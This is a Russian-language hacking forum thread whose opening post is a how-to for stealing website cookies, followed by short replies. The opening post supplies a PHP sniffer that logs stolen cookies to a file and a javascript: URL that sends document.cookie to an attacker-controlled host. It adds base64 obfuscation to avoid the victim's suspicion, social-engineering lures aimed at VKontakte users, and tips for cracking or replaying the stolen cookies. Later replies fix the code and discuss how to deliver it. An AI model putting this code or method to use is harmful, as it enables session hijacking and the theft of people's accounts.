Старый 16.08.2009, 23:30   #1
NAVIGATOR
Изгнан
 
Аватар для NAVIGATOR
 
Регистрация: 10.07.2009
Сообщений: 22
NAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспоримаNAVIGATOR репутация неоспорима
NAVIGATOR вне форума

По умолчанию мануал по угону куков с любого сайта


Hello World! В этой статье я расскажу об одном способе кражи файлов cookies, который почему-то не очень часто применяется…Статья – для новичков (матерые хакеры уже давно все знаю).
Этот способ основан на том, что в строку браузера кроме адреса веб-страниц можно также вставлять jаvаsсript – код, который выполнится на той веб – странице, на которой вы находитесь. Пример: если находясь на странице своего профиля vkontakte.ru в строке адреса набрать «jаvаsсript:alert(document.cookie);» то выведется всплывающее сообщение в котором будут ваши куки. Этот способ чем-то похож XSS – уязвимость, он позволяет выполнить произвольный jаvаsсript – код. А запретить вставлять в строку браузер jаvаsсript невозможно, поэтому этим способом можно пользоваться абсолютно на всех сайтах.
Хакерам ничто не мешает их таким же образом отправить к себе на ftp.
Этот способ очень моден сейчас. Почитайте, что он нем пишет администрация Контакта - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]. Отдельную тему даже создали, так как способ очень популярен.

--------------------------------------------------------------------------------

Сейчас мы попробуем написать такой jаvаsсript – код, который бы при вставке в строку браузера, отправлял куки жертвы на php (он называется сниффер), который в свою очередь сохранял бы их в текстовый файл на ftp – сервере. Хотя сейчас можно воспользоваться любым онлайн сниффером типа:
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] (архив со сниффером для заливки на хост)
Но мы попробуем сами написать свой php – сниффер и использовать его для кражи куков… Это всё не очень сложно, если ты знаешь jаvаsсript и php (хотя бы чуть-чуть).
Для начала нам понадобится любой хостинг с поддержкой php
создаем файл с расширением php и пишем там:
<?
$query = $_SERVER['QUERY_STRING']; //эта часть скрипта принимает украденные cookies,
переданные JavaScript'ом.
$query .= "\n"; //каждая запись производится с новой строки
$db="cookies.txt"; //здесь мы определили файл, куда будет производиться запись
полученных cookies.
$fh=fopen ($db, "a+"); //открыли файл для записи, запись всегда будет производиться в
конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); //после записи закрыли файл.
?>
Это код php – сниффера который будет обрабатывать куки жертвы.

заливаем его на хост

создаем сам jаvаsсript – код для вставки в строку браузе:
jаvаsсript:document.location.replace('http://ваш_сайт/ваш_пхп.php?com='+document.cookie);
Разберем его по частям:
1-aя часть: jаvаsсript:document.location.replacе - перенаправит украденные куки на наш сниффер.
2-aя часть: ('http://ваш_сайт/ваш_пхп.php - указывает на адрес нашего сниффера.
3-я часть: ?com='+document.cookie); - присваивает переменной com украденные cookies.
По выполнению этого скрипта куки будут отосланы на ваш ftp и записаны в файл cookies.txt

Следующий шаг - шифруем наш код алгоритмом base64 .Он превращает наш код в нечитаему краказябру, но при этом он продолжает работать Это нужно для тго, чтобы жертва ничего не заподозрила. Итак, заходим на сайт [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]. В верхнее поле вводим наш вредоносный jаvаsсript - код, нажимаем на кнопку "Encode", и в нижнем поле получаем наш зашифрованный код...Теперь, чтобы он заработал нужно в строке адреса написать:
data:text/html;base64, <дальше ваш зашифрованный код> Прописываем это в строку адреса, жмём Enter и вуаля, код сработал. Надо сказать, что эта фишка действует только в браузере Opera (во всяком случае у меня на компьютере).
Впариваем файл жертве. Впарить что-либо – это целиком дело социальной инженерии. Можно сказать, что скрипт поднимает рейтинг Вконтакте, или позволяет писать личные сообщения Павлу Дурову и т.д.

Вот и всё….в файл cookies.txt пришли куки жертвы. Их можно либо расшифровать (советую онлайн сервис расшифровки md5 - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.], хотя можно и домашним брутом PasswordsPro воспользоваться) либо сразу подставить (используйте браузер Opera или Firefox).

хакер.р
  Ответить с цитированием
Ответ: мануал по угону куков с любого сайта
Старый 05.11.2010, 17:04   #2
mega4el
RAM 128MB
 
Аватар для mega4el
 
Регистрация: 27.10.2010
Сообщений: 150
mega4el скоро придёт к известностиmega4el скоро придёт к известности
mega4el вне форума
По умолчанию Ответ: мануал по угону куков с любого сайта

Мне пригодилась информация!
  Ответить с цитированием
Ответ: мануал по угону куков с любого сайта
Старый 05.11.2010, 20:16   #3
Вадимка
RAM 64MB
 
Аватар для Вадимка
 
Регистрация: 09.02.2010
Сообщений: 94
Вадимка скоро придёт к известностиВадимка скоро придёт к известности
Вадимка вне форума
По умолчанию Ответ: мануал по угону куков с любого сайта

хз))) у меня последняя опера и в ней не работает


URL-адрес: [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] содержит номер порта вне диапазона от 1 до 65535.
Причиной проблемы может быть опечатка при вводе URL, но, возможно, это попытка заманить вас на веб-страницу, которую вы ошибочно примете за сайт, которому доверяете.
  Ответить с цитированием
Ответ: мануал по угону куков с любого сайта
Старый 07.11.2010, 16:59   #4
Gen1rus
RAM 16MB
 
Аватар для Gen1rus
 
Регистрация: 01.11.2010
Сообщений: 24
Gen1rus Новичок
Gen1rus вне форума
По умолчанию Ответ: мануал по угону куков с любого сайта

в опере и у меня не пашет
  Ответить с цитированием
Ответ: мануал по угону куков с любого сайта
Старый 08.11.2010, 02:10   #5
Вадимка
RAM 64MB
 
Аватар для Вадимка
 
Регистрация: 09.02.2010
Сообщений: 94
Вадимка скоро придёт к известностиВадимка скоро придёт к известности
Вадимка вне форума
По умолчанию Ответ: мануал по угону куков с любого сайта

так, ну в первом случае я разобрался )))автор забыл поставить "+" в записи
в общем код действует вот так:
javascript:alert("Cookies: "+document.cookie)
или
javascript:prompt("Cookies:",document.cookie)

Добавлено через 1 час 56 минут 12 секунд
итак)))) чтобы развеить мифы о невероятном способе кражи кукисов сделаю некоторые пояснения!!!!
итак начнём с того что метод описанный выше можно использовать только находясь на какойто определённой страничке, и получите вы кукисы именно для этой же странички
поясняю.....
находясь на странице ну например vkontakte.ru , стираем всё в строке адреса и пишем javascript:alert("Cookies: "+document.cookie)
в окне которое всплывёт,вы получите свои куки
метод с отпракой на php обраьотчик работает по тому же сценарию
поэтому, размещать такого рода ссылки нужно исключительно на том сайте куки которого вам нужны....
ну а так метод действительно рабочий!!! хочу заметить только что автор, писавший данную статью либо очень неграмотный либо специально наделал кучу ошибок в тексте(некоторые английские буквы заменены похожими русскими) поэтому не тупо копируем текст который написан в 1 посте , а сидим и переписываем это всё на буржуйском языке!! спасибо за внимание!!
  Ответить с цитированием
Последний раз редактировалось Вадимка; 08.11.2010 в 02:11. Причина: Добавлено сообщение
Ответ: мануал по угону куков с любого сайта
Старый 04.01.2017, 19:58   #6
cnfc
Юзверь
 
Аватар для cnfc
 
Регистрация: 04.01.2017
Сообщений: 1
cnfc Новичок
cnfc вне форума
По умолчанию Ответ: мануал РїРѕ СѓРіРѕРЅСѓ РєСѓРєРѕРІ СЃ любого сайта

есть один минус
хрен ты заставишь человека
1.скопировать непонятную ссылку
да еще вставить
2.проще отправить ссылку с переходом
основаную на клик
те штмл код либо бб
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot